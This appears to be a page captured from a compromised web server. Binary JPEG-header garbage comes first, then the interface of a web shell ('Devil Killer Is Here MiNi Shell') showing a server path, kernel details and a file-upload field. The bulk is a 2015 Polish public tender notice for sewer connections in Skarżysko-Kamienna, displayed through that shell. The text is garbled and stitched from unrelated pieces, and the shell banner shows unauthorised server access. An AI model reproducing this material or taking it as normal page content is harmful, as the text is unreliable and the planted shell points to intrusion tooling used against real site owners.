JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20151021/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20151021/153873-N-2015.html

<p class="kh_header"><b>Skarżysko-Kamienna: Budowa przyłączy kanalizacji sanitarnej - ETAP VI</b><br>
<b>Numer ogłoszenia: 153873 - 2015; data zamieszczenia: 21.10.2015</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b>
<!--zamówienia publicznego.</p>-->
<table class="text2">
<tr><td style="border: solid 1px; width:15px black; text-align: center;"><b>V</b></td>
<td>zamówienia publicznego</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>zawarcia umowy ramowej</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>ustanowienia dynamicznego systemu zakupów (DSZ)</td></tr>
</table>


<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Miejskie Przedsiębiorstwo Wodociągów i Kanalizacji Spółka z o.o. , ul. Cicha 8, 26-110 Skarżysko-Kamienna, woj. świętokrzyskie, tel. 041 2532273, faks 041 2531272.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.mpwik-skarzysko.eu</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Spółka Prawa Handlowego.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Budowa przyłączy kanalizacji sanitarnej - ETAP VI.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1. Inwestor przystępuje do realizacji inwestycji z udziałem środków krajowych, objętej dofinansowaniem w ramach Programu Priorytetowego Dofinansowanie przydomowych oczyszczalni ścieków oraz podłączeń  budynków do zbiorczego systemu kanalizacyjnego, uruchomionego przez Narodowy Fundusz Ochrony Środowiska i Gospodarki Wodnej w Warszawie, w ramach którego wykona przyłącza kanalizacji sanitarnej  budynków mieszkalnych oraz budynków użyteczności publicznej. 
Wykonanie robót budowlanych związanych z budową przyłączy realizowane będzie w ramach przedsięwzięcia pod nazwą: Podłączenie budynków do zbiorczego systemu kanalizacyjnego w Skarżysku-Kamiennej i Skarżysku Kościelnym. Budowa przyłączy będzie realizowana zgodnie z zapisami art. 30 ust. 1 pkt 1a , na podstawie art. 29a, budowa przyłączy będzie podlegała zgłoszeniu do właściciela sieci kanalizacyjnej, a więc do MPWiK Sp. z o.o. w Skarżysku-Kamiennej. 
Przedsięwzięcie realizowane będzie na terenie jednej aglomeracji, obejmującej gminę Skarżysko-Kamienna oraz gminę Skarżysko Kościelne.  
2. Przedmiot zamówienia objęty niniejszym postępowaniem przetargowym: 
CZĘŚĆ Nr: I 
Zadanie 1 - Budowa przyłączy kanalizacji sanitarnej w Skarżysku-Kamiennej i Skarżysku-Kościelnym.
Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:
Zadanie obejmuje zakresem budowę przyłączy kanalizacji sanitarnej na terenie gminy Skarżysko-Kamienna, osiedla: Pogorzałe, Książęce, Bzinek, Łyżwy, Usłów oraz na terenie gminy Skarżysko Kościelne, miejscowości Lipowe Pole Plebańskie, Grzybowa Góra.  

W w.w zakres wchodzi budowa 17 szt. przyłączy w tym:
- 1 szt - odcinków przyłączy zbiorczych - wspólnych. 
Przyłącza zbiorcze zostały wydzielone z całości z uwagi na brak dofinansowania. Realizacja odcinków przyłączy zbiorczych będzie finansowana ze środków własnych MPWiK Sp. z o.o.
Planowany termin realizacji całości przedsięwzięcia zgodnie z aktualnym na dzień ogłoszenia postępowania przetargowego harmonogramem rzeczowo - finansowym  będącym załącznikiem do wniosku o dofinansowanie - najpóźniej do dnia 10.01.2016r.    
3. Przedmiot niniejszego zamówienia stanowi:
1. Przedmiotem zamówienia jest budowa przyłączy kanalizacji sanitarnej realizowana zgodnie z zapisami art. 30 ust. 1 pkt 1a , na podstawie art. 29a,  ustawy z dnia 7 lipca 1994r. Prawo budowlane -tekst jednolity Dz. U. z 2013r. poz. 1409 z późniejszymi zmianami. 
Budowa przyłączy będzie podlegała zgłoszeniu do właściciela sieci kanalizacyjnej, a więc do MPWiK Sp. z o.o. w Skarżysku-Kamiennej. 
2. W ramach niniejszego przedmiotu zamówienia Wykonawca zobowiązany jest do:
- wybudowania przyłącza kanalizacyjnego zgodnie z opracowanym przez Zamawiającego projektem budowlanym
- wykonania wszystkich robót budowlanych wraz z robotami odtworzeniowymi
- wytyczenia geodezyjnego trasy przyłącza
- sporządzenia inwentaryzacji geodezyjnej wybudowanego przyłącza wraz z wniesieniem jej do 
   państwowego zasobu geodezyjnego i kartograficznego
Wykonawca zobowiązany jest opracować i przedłożyć Zamawiającemu, przed przyjęciem robót, dokumentację powykonawczą przedstawiającą wszystkie obiekty tak, jak zrealizował je Wykonawca, z zaznaczeniem lokalizacji, wymiarów i detali wykonanych robót. Dokumentacja musi być przygotowana zgodnie z aktualnie obowiązującymi przepisami prawa w Polsce.
Inwentaryzacja powykonawcza musi zostać sporządzona w trzech egzemplarzach w wersji papierowej oraz jednym egzemplarzu w wersji elektronicznej. 
W wersji papierowej:
- na sekcjach w układzie 2000 w skali 1:500 lub 1:1000.
W wersji elektronicznej:
- w pliku dxf oraz komplet szkiców inwentaryzacji powykonawczej i współrzędne pomierzonych punktów zapisane w pliku tekstowym txt. 

oraz wykonania wszystkich robót wymienionych w załączonych przedmiarach robót oraz innych robót, które przez Zamawiającego nie zostały wyszczególnione w przedmiarach, a są niezbędne do prawidłowej realizacji  przedmiotu zamówienia zgodnie z opracowaną dokumentacją w zakresie wyszczególnionym w opisie technicznym , przedstawionym na sytuacji lub na profilu. Załączone do dokumentacji przetargowej przedmiary robót są elementem pomocniczym, a wyszczególnione w nich zakresy robót nie ograniczają Wykonawcy w zakresie wykonania całości wskazanego w dokumentacji przyłącza kanalizacyjnego..</p>
<p><b>II.1.5)
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
<td><b>przewiduje się udzielenie zamówień uzupełniających</b></td></tr>
</table>                            
</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li>
<li></li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 45.23.13.00-8, 45.23.24.10-9, 45.10.00.00-8, 45.11.12.00-0, 45.11.27.00-2, 45.23.30.00-9.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w dniach: 40.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Każdy Wykonawca zobowiązany jest zabezpieczyć swą ofertę wadium w wysokości: 

5.000,00 PLN pięć tysięcy złotych</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>o	oświadczenie o spełnianiu warunków udziału w postępowaniu zgodnie z art. 22 ustawy Pzp wzoru stanowiącego załącznik nr 3 do niniejszej IDW -w przypadku wspólnego ubiegania się o udzielenie niniejszego zamówienia przez dwóch lub więcej Wykonawców oświadczenie składa w ich imieniu ustanowiony do reprezentowania w postępowaniu pełnomocnik lub łącznie wszyscy Wykonawcy składający wspólną ofertę. Ocena spełniania przedstawionych powyżej warunków zostanie dokonana wg formuły: spełnia - nie spełnia.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>o	W celu wykazania spełnienia przez wykonawcę warunków, o których mowa w pkt. 9.1.b. powyżej w zakresie posiadania niezbędnej wiedzy i doświadczenia, Wykonawca jest zobowiązany złożyć: w przypadku wspólnego ubiegania się dwóch lub więcej Wykonawców o udzielenie niniejszego zamówienia, oceniany będzie ich łączny potencjał techniczny i kadrowy oraz łączne kwalifikacje i doświadczenie: wykaz robót budowlanych wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz z załączeniem dowodów dotyczących najważniejszych robót, określających , czy roboty te zostały wykonane w sposób należyty oraz wskazujących, czy zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone. Wykonawca ustala samodzielnie, które roboty budowlane uznaje za najważniejsze i tylko te wskazuje w wykazie robót budowlanych oraz tylko dla tych przedstawia dowody. Na podstawie § 1 ust. 4 rozporządzenia Prezesa Rady Ministrów z dnia 19 lutego 2013 r. w sprawie rodzajów dokumentów, jakich może żądać zamawiający od wykonawcy, oraz form, w jakich te dokumenty mogą być składane, Zamawiający dopuszcza wykazanie w wykazie tylko robót budowlanych, określonych, spełniających warunek udziału w postępowaniu w zakresie wiedzy i doświadczenia tj: Wykonawca jest zobowiązany wykazać w wykazie, wykonane w okresie ostatnich pięciu lat przed dniem wszczęcia postępowania a jeżeli okres prowadzenia działalności jest krótszy w tym okresie, wszystkich robót budowlanych polegających na budowie sieci kanalizacji sanitarnej -grawitacyjnej lub tłocznej lub kanalizacji deszczowej - o wartości robót co najmniej 150 tys. PLN netto bez podatku VAT. Minimalna ilość wykazanych robót budowlanych to jedna robota.Wzór wykazu stanowi załącznik nr 6 do niniejszej IDW. Ocena spełniania przedstawionych powyżej warunków zostanie dokonana wg formuły: spełnia - nie spełnia.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>o	oświadczenie o spełnianiu warunków udziału w postępowaniu zgodnie z art. 22 ustawy Pzp wzoru stanowiącego załącznik nr 3 do niniejszej IDW -w przypadku wspólnego ubiegania się o udzielenie niniejszego zamówienia przez dwóch lub więcej Wykonawców oświadczenie składa w ich imieniu ustanowiony do reprezentowania w postępowaniu pełnomocnik lub łącznie wszyscy Wykonawcy składający wspólną ofertę. Ocena spełniania przedstawionych powyżej warunków zostanie dokonana wg formuły: spełnia - nie spełnia.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>o	W celu wykazania spełnienia przez wykonawcę warunków, o których mowa w pkt. 9.1.c powyżej w zakresie dysponowania potencjałem technicznym i osobami zdolnymi do wykonania niniejszego zamówienia wykonawca -w przypadku wspólnego ubiegania się dwóch lub więcej Wykonawców o udzielenie niniejszego zamówienia, oceniany będzie ich łączny potencjał techniczny i kadrowy oraz łączne kwalifikacje i doświadczenie: wskaże do uczestniczenia w wykonaniu niniejszego zamówienia następujące osoby wraz z informacjami na temat ich kwalifikacji zawodowych, wykształcenia i doświadczenia, niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nich czynności: Kierownik Robót Sanitarnych -Kierownik Budowy - jedna osoba - posiadający: -wykształcenie techniczne, -co najmniej 3 lata doświadczenia -licząc od dnia uzyskania uprawnień- na stanowisku kierownika robót z zakresu budowy systemów kanalizacji sanitarnej, posiadający uprawnienia budowlane do kierowania robotami budowlanymi w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń cieplnych, wentylacyjnych, gazowych, wodociągowych i kanalizacyjnych lub odpowiadające im ważne uprawnienia budowlane do kierowania robotami w zakresie sieci i instalacji sanitarnych, które zostały wydane na podstawie wcześniej obowiązujących przepisów. W celu potwierdzenia spełniania w.w warunków Wykonawcy zobowiązani są przedłożyć wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia wraz z informacjami nt. ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnymi do wykonania zamówienia, a także wykonywanych przez nich czynności oraz informacji o podstawie do dysponowania tymi osobami. W tym celu Wykonawcy winni wypełnić załącznik nr 5.1, 5.2 do niniejszej IDW. Ocena spełniania przedstawionych powyżej warunków zostanie dokonana wg formuły: spełnia - nie spełnia.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>o	W celu wykazania spełnienia przez wykonawcę warunków, o których mowa w pkt. 9.1.d.IDW powyżej w zakresie znajdowania się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie niniejszego zamówienia, Wykonawca musi spełniać następujące warunki - w przypadku wspólnego ubiegania się dwóch lub więcej Wykonawców o udzielenie niniejszego zamówienia, oceniana będzie ich łączna sytuacja ekonomiczna i finansowa - w tym celu dokumenty ma obowiązek złożyć ten lub ci z Wykonawców, którzy w imieniu wszystkich wykazywać będą spełnienie tego warunku: posiadać ubezpieczenie od odpowiedzialności cywilnej w zakresie prowadzonej działalności na kwotę min. 200 tys. PLN. W celu potwierdzenia spełniania warunku Wykonawca musi złożyć opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia. W przypadku wspólnego ubiegania się dwóch lub więcej Wykonawców o udzielenie niniejszego zamówienia, każdy z nich musi złożyć przedmiotowy dokument, przy czym łącznie muszą spełniać wymaganie Zamawiającego odniesieniu do kwoty ubezpieczenia od odpowiedzialności cywilnej w zakresie prowadzonej działalności gospodarczej. Ocena spełniania przedstawionych powyżej warunków zostanie dokonana wg formuły: spełnia - nie spełnia.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz z załączeniem dowodów dotyczących najważniejszych robót, określających, czy roboty te zostały wykonane w sposób należyty oraz wskazujących, czy zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia.</li>

</ul><p>Wykonawca powołujący się przy wykazywaniu spełnienia warunków udziału w postępowaniu, o których mowa w art. 22 ust. 1 pkt 4 ustawy, na zasoby innych podmiotów przedkłada następujące dokumenty dotyczące podmiotów, zasobami których będzie dysponował wykonawca:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
			
<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że inny podmiot jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 95</li>
<li>2 - Termin realizacji zamówienia - 5</li>
</ul>
<p><b>IV.2.2)</b>
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
    <td><b>przeprowadzona będzie aukcja elektroniczna,</b> adres strony, na której będzie prowadzona: </td></tr>
</table>                            
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Przewiduje się możliwość dokonania zmian umowy w sytuacji gdy:
1.nastąpią istotne zmiany przepisów lub norm mających zastosowanie do przedmiotu zamówienia
2.nastąpią zmiany obowiązującej stawki VAT z tym, że wynagrodzenie netto pozostanie nie zmienione
3. zaistnieje potrzeba wykonania prac dodatkowych, nie objętych przedmiotem niniejszego zamówienia koniecznych do jego prawidłowego wykonania, w szczególności bez których nie zostałyby osiągnięte zakładane parametry w tym zakładany efekt ekologiczny
4. zaistnieje istotna zmiana okoliczności powodująca, że wykonanie części przedmiotu zamówienia nie leży w interesie publicznym, czego nie można było przewidzieć w chwili zawarcia umowy
5. nastąpi konieczność opracowania zamiennej dokumentacji projektowej z uwagi na np.: brak zgody właścicieli nieruchomości na realizację zadania zgodnie z opracowanym projektem budowanym, lub z uwagi na wynikające w trakcie realizacji błędy projektowe lub inne sytuacje które uniemożliwiają prowadzenie robót zgodnie z projektem.  
6. nastąpi nieprzewidziana zmiana podwykonawców
7. nastąpi nieprzewidziana zmiana ekspertów, w tym kierowników budowy lub robót, z zastrzeżeniem, że taka zmiana musi nastąpić na osoby, które spełniają warunki określone w pkt. 9.3.  niniejszej IDW
8. z przyczyn niezależnych od Wykonawcy nie można wykonać zadania w terminie w tym w szczególności z uwagi na:
a. wystąpienie nieprzewidzianych warunków i zjawisk atmosferycznych - kataklizmy,
b. konieczność wykonania zamiennej dokumentacji projektowej,
c. konieczność przeprowadzenia uzgodnień prawnych lub technicznych,
d. wstrzymanie budowy przez właściwy organ z przyczyn nie zawinionych przez Wykonawcę, np.: dokonanie odkrywki archeologicznej, odkrycie niewybuchu, itp.,
e. wystąpienie siły wyższej np.: trąby powietrznej, pożaru, powodzi,
f. wystąpienie przedłużenia się okresu osiągania parametrów technologicznych nie zawinionego przez Wykonawcę,
g. wystąpienie osuwisk gruntu nie ustalonych w oparciu o dokonane badania geologiczne lub występujące ponad normy, oraz innych nie dających się przewidzieć zjawisk geologicznych i hydrogeologicznych pojawiających się w trakcie budowy,
h. wystąpienie udokumentowanych przez Wykonawcę, nie zawinionych przez niego opóźnień w dostawie urządzeń technologicznych.
9. pozostałe zmiany:
a. zmiana sposobu rozliczania umowy lub dokonywania płatności na rzecz Wykonawcy na skutek zmian zawartej przez Zamawiającego umowy o dofinansowanie projektu lub wytycznych dotyczących realizacji projektu;
b. rezygnacja przez Zamawiającego z realizacji części przedmiotu umowy. W przypadku rezygnacji przez Zamawiającego z części zamówienia tj. elementu formularza cenowego , wartość niezrealizowanych robót zostanie wyliczona na podstawie wartości wykazanej przez Wykonawcę w odpowiedniej pozycji Tabeli formularza cenowego . W przypadku rezygnacji przez Zamawiającego z części elementu Wykazu Cen, wartość niezrealizowanych robót zostanie wyliczona proporcjonalnie na podstawie wartości wykazanych przez Wykonawcę w odpowiedniej pozycji Formularza cenowego oraz wartości wyliczonych przez Wykonawcę w kosztorysie szczegółowym zaakceptowanym przez Inspektora Nadzoru i Zamawiającego w oparciu o nakłady wyszczególnione w Katalogach Nakładów Rzeczowych przy uwzględnieniu średnich wartości wskaźników cenotwórczych -kosztów ogólnych i zysku- oraz cen robocizny, materiałów i sprzętu dla województwa świętokrzyskiego, opublikowanych w wydawnictwie SEKOCENBUD w kwartale poprzedzającym kwartał realizacji robót. Zamawiający zapłaci za wszystkie dotychczas spełnione świadczenia oraz udokumentowane koszty, które Wykonawca poniósł w związku z wynikającymi z umowy planowanymi świadczeniami;
c. kolizja z planowanymi lub równolegle prowadzonymi przez inne podmioty inwestycjami. W takim przypadku zmiany w umowie zostaną ograniczone do zmian koniecznych powodujących uniknięcie kolizji;
Zapisy niniejszego punktu nie mogą spowodować przedłużenia terminu wykonania Umowy ale mogą spowodować zmianę terminu wykonania zadania wynikającą z Harmonogramu robót, przy czym zmiana taka nie może pociągać za sobą zmiany wynagrodzenia Wykonawcy.
d. wydłużenie okresu gwarancji lub rękojmi, o dowolny okres. Niniejsza zmiana nie może spowodować zmiany wynagrodzenia Wykonawcy.

W nawiązaniu do art. 144 ust. 2 zmiana umowy dokonana w innych przypadkach niż określono powyżej jest nieważna.

10. Pozostałe kwestie odnoszące się do zmian umowy uregulowane są w Części II niniejszej SIWZ. 
